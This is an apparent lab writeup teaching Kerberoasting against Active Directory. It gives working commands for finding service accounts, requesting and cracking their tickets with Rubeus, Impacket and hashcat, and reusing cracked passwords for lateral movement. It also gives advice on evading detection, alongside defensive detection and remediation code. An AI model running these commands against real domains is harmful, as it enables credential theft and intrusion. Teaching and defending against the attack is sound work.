Kerberoasting

Level: intermediate | Duration: 35 min | Type: Writeup

Extracting and cracking service account credentials

Learning Objectives

  • Understand Kerberoasting
  • Request service tickets
  • Extract TGS hashes
  • Crack service account passwords

Kerberoasting is one of the most powerful attacks against Active Directory. Any domain user can request service tickets for accounts with SPNs, and those tickets are encrypted with the account's password hash - which means they can be cracked offline.

Think of it like this: you ask the bouncer for a VIP pass (service ticket), and the pass is protected with a lock (password hash). You take the pass home and try every key until one works. The bouncer never knows you're attacking the lock.

No Special Privileges Required

The beauty of Kerberoasting is that ANY domain user can request service tickets. You don't need admin rights, just valid domain credentials.

How Kerberoasting Works

```text
1. User requests TGS (service ticket) for SPN
   User --> KDC: "I want to access MSSQLSvc/sql01.corp.local"

2. KDC returns TGS encrypted with service account's hash
   KDC --> User: [TGS encrypted with svc_sql's NTLM hash]

3. Attacker extracts encrypted part of ticket
   Extract: RC4 encrypted blob = f(password hash)

4. Attacker cracks offline
   Hashcat: Try passwords until one decrypts the ticket

5. Attacker now has service account password!
```

Why It Works

This is a fundamental design decision in Kerberos: the service ticket MUST be encrypted with the service account's key so the service can decrypt it, and any authenticated principal is allowed to ask for one. Microsoft can't fix this without breaking Kerberos. What can change is how hard that key is to recover, which is why the defenses later on this page are long random passwords, gMSA and AES rather than a patch.

Finding Kerberoastable Accounts

```powershell
# PowerShell - Find SPNs (ActiveDirectory module; Get-ADUser returns user objects only)
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName

# PowerView
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname

# LDAP query via DirectorySearcher (no AD module needed)
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
# This filter also matches computer objects, which have long random passwords and are not practical targets
$search.Filter = "(servicePrincipalName=*)"
$search.FindAll() | ForEach-Object { $_.Properties.samaccountname }
```

```bash
# Impacket GetUserSPNs.py - list user accounts with SPNs (no tickets requested yet)
GetUserSPNs.py corp.local/user:password -dc-ip 192.168.1.10

# ldapsearch (add (objectCategory=person) to the filter to exclude computer objects)
ldapsearch -x -H ldap://dc.corp.local -D "user@corp.local" -w 'pass' \
    -b "DC=corp,DC=local" "(servicePrincipalName=*)" sAMAccountName servicePrincipalName
```

Performing the Attack

From Windows

```powershell
# Rubeus - Most popular tool (hashcat-format output by default)
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:hash.txt

# Request RC4 tickets where the account still allows them (easier to crack)
.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

# PowerView + Request-SPNTicket
Request-SPNTicket -SPN "MSSQLSvc/sql01.corp.local"

# Invoke-Kerberoast (from PowerSploit)
Import-Module .\Invoke-Kerberoast.ps1
# -ExpandProperty writes the bare hash strings; -Encoding ASCII avoids the UTF-16 default that hashcat cannot parse
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File hashes.txt -Encoding ASCII
```

From Linux

```bash
# Impacket GetUserSPNs.py - Request tickets and save hashes
GetUserSPNs.py corp.local/user:password -dc-ip 192.168.1.10 -request -outputfile hashes.txt

# Target specific user (the Impacket flag is -request-user, which implies -request)
GetUserSPNs.py corp.local/user:password -dc-ip 192.168.1.10 -request-user svc_sql
```

RC4 vs AES

Older service accounts still accept RC4 (the default unless the account is restricted to AES), so their tickets come back RC4-encrypted, which is much easier and faster to crack. Newer ones might use AES256. Use /tgtdeleg in Rubeus to force RC4 when possible; an account configured as AES-only will still return an AES ticket.

Cracking the Hashes

```bash
# Hashcat - Most efficient (GPU)
# Mode 13100 = Kerberos 5 TGS-REP (RC4)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule

# Mode 19600 = Kerberos 5 TGS-REP (AES-128)
# Mode 19700 = Kerberos 5 TGS-REP (AES-256)
# Keep RC4 and AES hashes in separate files: hashcat skips lines that do not parse for the selected mode
hashcat -m 19700 hashes.txt rockyou.txt

# John the Ripper
john --format=krb5tgs --wordlist=rockyou.txt hashes.txt
```

Cracking Speed

RC4 hashes crack at ~billions per second on modern GPUs. AES256 is slower but still feasible. Weak service account passwords fall quickly.

Using Cracked Credentials

```bash
# Once you have the password, use it!

# Check where svc_sql is admin
crackmapexec smb 192.168.1.0/24 -u svc_sql -p 'CrackedPassword123'

# PSExec if local admin
psexec.py corp.local/svc_sql:'CrackedPassword123'@target

# WinRM
evil-winrm -i target -u svc_sql -p 'CrackedPassword123'

# Check for SQL access (if MSSQLSvc SPN)
mssqlclient.py corp.local/svc_sql:'CrackedPassword123'@sql01.corp.local
```

Targeted Kerberoasting

Not all Kerberoastable accounts are equal. Prioritize based on:

  • Privileged Group Membership: Admins, Backup Operators
  • AdminCount = 1: Protected by AdminSDHolder
  • Password Age: Old passwords might be weaker
  • Account Type: Service accounts often have weak passwords

```powershell
# Find high-value Kerberoastable accounts
Get-ADUser -Filter {ServicePrincipalName -like "*" -and AdminCount -eq 1} -Properties *

# Check group memberships (MemberOf lists direct membership only; nested groups need Get-ADPrincipalGroupMembership or a recursive query)
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties MemberOf |
    Where-Object { $_.MemberOf -match "Admin" }
```
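A defender's view of the same prioritization, as an added Python example (not code from this page): it scores SPN-bearing accounts on the attributes listed above (adminCount, admin group membership, password age, RC4 still allowed via msDS-SupportedEncryptionTypes) so the accounts most worth moving to gMSA, a 25+ character password or AES-only are fixed first. The sample directory objects, the scoring weights and the one-year password age threshold are assumptions.

```python
from datetime import datetime

# msDS-SupportedEncryptionTypes bits; 0 or absent means the KDC will still issue RC4 tickets.
RC4_HMAC, AES128, AES256 = 0x4, 0x8, 0x10
GMSA_CLASS = "msDS-GroupManagedServiceAccount"
NOW = datetime(2024, 5, 1)  # assumed "today" for the constructed sample

# Constructed sample directory objects (not a real export); attribute names follow the AD schema.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "servicePrincipalName": ["MSSQLSvc/sql01.corp.local"],
     "adminCount": 1, "pwdLastSet": datetime(2018, 1, 10), "msDS-SupportedEncryptionTypes": 0,
     "objectClass": "user", "memberOf": ["CN=Domain Admins,CN=Users,DC=corp,DC=local"]},
    {"sAMAccountName": "svc_http", "servicePrincipalName": ["HTTP/web01.corp.local"],
     "adminCount": 0, "pwdLastSet": datetime(2024, 2, 1), "msDS-SupportedEncryptionTypes": AES256,
     "objectClass": "user", "memberOf": []},
    {"sAMAccountName": "gmsa_backup$", "servicePrincipalName": ["HOST/bak01.corp.local"],
     "adminCount": 0, "pwdLastSet": datetime(2024, 4, 20), "msDS-SupportedEncryptionTypes": AES256,
     "objectClass": GMSA_CLASS, "memberOf": ["CN=Backup Operators,CN=Builtin,DC=corp,DC=local"]},
]


def assess(account, now, max_pwd_age_days=365):
    """Return (score, reasons) for one SPN-bearing account; a higher score means fix it sooner."""
    if account["objectClass"] == GMSA_CLASS:
        return 0, ["gMSA: long random password rotated automatically, not a practical cracking target"]
    score, reasons = 0, []
    if account["adminCount"] == 1 or any("Admin" in g for g in account["memberOf"]):
        score += 3
        reasons.append("privileged (adminCount=1 or member of an Admin group)")
    enc = account["msDS-SupportedEncryptionTypes"]
    if enc == 0 or enc & RC4_HMAC:
        score += 2
        reasons.append("RC4 tickets allowed (crackable at hashcat mode 13100 speeds)")
    age_days = (now - account["pwdLastSet"]).days
    if age_days > max_pwd_age_days:
        score += 2
        reasons.append(f"password last set {age_days} days ago")
    if not reasons:
        reasons.append("AES-only, recent password, unprivileged: still enforce 25+ characters")
    return score, reasons


def remediation_order(accounts, now):
    """Accounts sorted highest risk first as (sAMAccountName, score, reasons)."""
    ranked = [(a["sAMAccountName"], *assess(a, now)) for a in accounts]
    return sorted(ranked, key=lambda r: r[1], reverse=True)
```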

Kerberoasting Methodology

Kerberoasting Attack Flow

1. Enumerate: Find all accounts with SPNs
2. Prioritize: Focus on privileged/high-value accounts
3. Request: Get service tickets for targets
4. Extract: Save hashes in hashcat format
5. Crack: Run hashcat with good wordlists and rules
6. Use: Authenticate with cracked passwords

Detection & Prevention

```text
Detection:
├── Event ID 4769 - TGS requests
│   └── Watch for many requests from single user
├── Event ID 4768 - TGT requests
│   └── Watch for requests with RC4 encryption
└── Monitor for known Kerberoasting tools

Prevention:
├── Use strong passwords for service accounts (25+ chars)
├── Use Group Managed Service Accounts (gMSA)
├── Disable RC4 encryption where possible
├── Limit who can read SPN attributes
└── Regular service account password rotation
```
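The two 4769 detection points above turned into logic you can run, as an added Python example (not from the page) over a few constructed 4769 records: it lists RC4 (0x17) tickets issued for user-account SPNs and flags any single requester that collects tickets for many distinct SPNs inside a short window. The field names mirror the 4769 event's XML fields; the sample records, the five-minute window and the threshold of five SPNs are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs): one Event ID 4769 per line as key=value pairs.
SAMPLE_4769 = """\
2024-05-01T09:00:01 EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=SQL01$ TicketEncryptionType=0x12
2024-05-01T09:12:00 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17
2024-05-01T09:12:01 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_http TicketEncryptionType=0x17
2024-05-01T09:12:01 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17
2024-05-01T09:12:02 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sharepoint TicketEncryptionType=0x17
2024-05-01T09:12:02 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_exchange TicketEncryptionType=0x17
2024-05-01T10:30:00 EventID=4769 TargetUserName=carol@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17
"""


def parse_4769(text):
    """Turn the key=value lines into dicts with a parsed timestamp."""
    events = []
    for line in text.strip().splitlines():
        stamp, _, rest = line.partition(" ")
        fields = dict(kv.split("=", 1) for kv in rest.split())
        fields["time"] = datetime.fromisoformat(stamp)
        events.append(fields)
    return events


def is_service_account_ticket(e):
    # Computer accounts end in '$' and have random passwords; Kerberoasting targets user SPNs.
    return e["EventID"] == "4769" and not e["ServiceName"].endswith("$")


def rc4_service_tickets(events):
    # etype 0x17 = RC4-HMAC; AES tickets show 0x11 (AES-128) or 0x12 (AES-256).
    return [(e["TargetUserName"], e["ServiceName"]) for e in events
            if is_service_account_ticket(e) and e["TicketEncryptionType"] == "0x17"]


def find_kerberoast_bursts(events, window=timedelta(minutes=5), threshold=5):
    """Flag a requester that pulls tickets for many distinct SPNs inside one window."""
    by_user = defaultdict(list)
    for e in events:
        if is_service_account_ticket(e):
            by_user[e["TargetUserName"]].append(e)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        best = set()
        for i, first in enumerate(evs):  # window anchored at each event in turn
            seen = {e["ServiceName"] for e in evs[i:] if e["time"] - first["time"] <= window}
            best = max(best, seen, key=len)
        if len(best) >= threshold:
            alerts.append((user, sorted(best)))
    return alerts
```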

OPSEC

Requesting many service tickets at once looks suspicious. Space out requests or target only high-value accounts to avoid detection.

Knowledge Check

Quick Quiz

What makes an account vulnerable to Kerberoasting?

Challenges

Kerberoast the Domain

Challenge (intermediate)

Find all Kerberoastable accounts, request their tickets, and crack at least one password.


Key Takeaways

  • Any domain user can Kerberoast - no special privileges needed
  • Accounts with SPNs can have tickets requested and cracked offline
  • Service account passwords are often weak and reused
  • Use hashcat mode 13100 for RC4, 19700 for AES256
  • Prioritize privileged accounts for targeted attacks
  • gMSA accounts are resistant to Kerberoasting